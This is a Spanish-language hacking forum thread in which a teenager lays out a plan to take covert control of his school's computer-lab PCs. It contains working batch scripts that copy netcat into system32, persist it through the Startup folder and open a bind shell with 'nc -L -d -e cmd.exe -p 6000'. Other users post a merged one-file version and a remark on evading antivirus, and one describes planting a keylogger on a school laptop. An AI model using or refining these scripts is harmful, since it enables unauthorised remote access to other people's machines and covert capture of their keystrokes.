Diario de un alumno en clase de informatica

Iniciado por fede_cp, 3 Noviembre 2009, 04:45 AM

0 Miembros y 1 Visitante están viendo este tema.

fede_cp

Diario de un alumno en clase de informatica

Gente, este es un post, en el que venía pensando hace tiempo y bueno, aca lo estoy haciendo. Trata de algo asi como una anecdota, o
algo "planeado" para una intrusion en las PC, de las computadoras de la escuela en la clase de informatica en la clase (no intervenir
desde una casa), para despues molestar o simplemente para matar el aburrimiento en la clase.

Esto podría ser:Un acto verídico (ya pasado), algo todavía no realizado (pero real).

NO romper lo siguiente: No se puede inventar el "escenario". Es decir algo que pasó o un escenario existente (no revelar cual XD).


Bueno empiezo con el mío:

14 computadoras (corriendo windows), en red (cable :P), una maquina server (windows server 2000)

Resulta que en clase empeze a pensar alguna forma de ir teniendo el control de las Pc de la clase, lo primero que se me ocurrió ( y que tengo bien claro)
es el netcat, hacer multiples conexiones (directas), hacia mi PC, y ahi tener una shell, y por ende, una especia de control total
comenzé a investigar, y se encontraban algunas carpetas compartidas, y razoné que se podría "sacar jugo", entonces fui a la carpeta compartida
y luego hice 3 archivos(en mi casa los cree obviamente), dos, tienen que estar en la pc vicitma.

1º archivo:coloca el netcat en system32 y se ejecuta
2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida

ejecuto los 2 archivos, y entonces estaría funcionando, la mision, solo hace falta hacer un: net view, y conectarse

pero para la ejecucion de estos archivos tiene que ser por acceso fisico (que no es un gran problema, es solo ir a la carpeta compartida
y ejecutarlos).

ARCHIVOS:
1º archivo:coloca el netcat en system32 y se ejecuta.

lo tengo en .exe (lo compile con el quick batch compiler)
es facil su funcionamiento copia de %MYFILES% a system32
y lo ejecuta

2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida.
Código (dos) [Seleccionar]
@echo off
copy "D:\Misdoc\fede\intrusion escuela\base.bat" "%userprofile%\Men£ Inicio\Programas\Inicio\"
exit


simplemente eso.

3º archivo:ejecucion de un archivo (netcat a la escucha)

Código (dos) [Seleccionar]
@echo off
start nc.exe -L -d -e cmd.exe -p 6000
exit


simplemente eso.

Diagrama:


Como pueden ver es muy sencillo, programitas programados en batch.

si se preguntan porque los primeros dos archivos no los hice en uno solo:es porque ya lo habia intentado antes y me daba
siempre algún error.

asique decidi hacerlo por partes.

bueno aca termina, espero que no sea la ultima anecdota, o plan de intrusión.
en mi caso, todos los datos son veridicos, pero todavía no fue probado, vuelvo de un viaje :D y lo pruebo.

si no tienen ninguna anecdota lo que pueden hacer es como mejorrar, o facilitar, o para no tener que estar fisicamente en la pc ¬¬, a los planes estos, y si se llego hacer en la realidad por favor decir como salió todo obviamente.


PD: tengo 14 años dentro de todo esta bien jajaja
saludos
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

Mindil

yo tampoco soy un experto pero si corregidme si me equivoco XD. Para tenerlo todo en un archivo lo puesto asi...

  @echo off
copy "c:\nc.exe" "c:\WINDOWS\system32\"
cd "c:\WINDOWS\system32\"
copy "c:\WINDOWS\system32\nc.exe" "%userprofile%\Men£ Inicio\Programas\Inicio\"
cd\
start nc.exe -L -d -e cmd.exe -p 6000
exit



fede_cp

Tu code no estaría mal si el nc.exe ya estaria en algun directorio, pero el problema es que el netcat en mi caso no lo estaba, entonces use el quick batch compiler, lo inclui (es una opcion que tiene el qbfc), y entonces use

@echo off
copy %MYFILES%\nc.exe %systemroot%\system32

no es necesario poner change directory, porque al estar en system32, se ejecuta desde alli y no es necesario

despues el otro copy si esta bien

start nc.exe -L -d -e cmd.exe -p 6000

esto tambien esta bien, pero acordate que no es necesario poner cd porque por eso se lo paso a system32, para no tener que cambiar de directorio

saludos!

PD:comenten si les gusto la idea, seria un buen intercambio de difierentes tipso de intrusiones, en diferentes escenarios con diferentes restricciones y posibilidades.
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

VirajeCR

Cita de: fede_cp en  3 Noviembre 2009, 04:45 AM
1º archivo:coloca el netcat en system32 y se ejecuta

Como que la seguridad no existe por acá. :o

fede_cp

Cita de: virajecr en  3 Noviembre 2009, 18:44 PM
Cita de: fede_cp en  3 Noviembre 2009, 04:45 AM
1º archivo:coloca el netcat en system32 y se ejecuta

Como que la seguridad no existe por acá. :o

El netcat no es reconocido por el nod 32 (no salta, en el escanneo si lo hace)

saludos!
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

Novlucker

A lo que se refiere es que para poder meter en nc en esa carpeta necesitas permisos de Admin, y que esten habilitados en un salon es malo ... ahora, con respecto a tu método, aún no lo entiendo, quién ejecuta que cosa y de que manera? XD, tu metes esos archivos en una carpeta compartida?

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

jdc

Yo estoy jodido en mi escuela, ya que tienen el deep freeze última versión que sólo jodé el fdf boteable... Además sería mucho daño sólo para jugar :) lo que sí me gustaría hacer es joder el PC con Windows server que tiene instalado oracle para así ver como lo instalan de nuevo y aprender bien de forma práctica xD pero en mi vida he usado Windows server por lo tanto ni hablar de programar algo para joderlo

fede_cp

aca estoy, jaja, em es asi la cosa, osea yo tengo una carpeta, que NO es necesario ser admin para manejarlas y modificarlas, osea no hay casi nada de seguridad.

entonces por ejemplo yo si quiero puedo modificarle el nombre de la carpeta, puedo manejar los archivos, modificarlos, casi todo se puede hacer  ;-) :laugh:

entonces tengo que tener acceso fisico a cada una de las pc, y lo tengo, entonces me dirijo a la carpeta compartida que anteriormente había colocado los archivos, voy rapidamente sin que nadie se entere y ejecuto los dos archivos en su respectivo orden.

si funciona lo voy a comentar.

saludos
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

fede_cp

no se olviden, que es mejorable mucho mas, y por favor diganlo jajja, esa es la ideaa

y si tienen algun metodo posteenlo

saludoos
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

1112815

El otro día puse en keylogger muy simple en el portatil de mi cole. El caso es que tenía autologin como administrador (windows xp), así que puse en la carpeta inicio un keylogger ejecutable muy simple que lo que hace es guardar los logs en system32.

Nah, es por lammear un poco, si de verdad estuviera interesado haría que me mandara los logs por ftp o algo, pero me da pereza... que vago soy... xD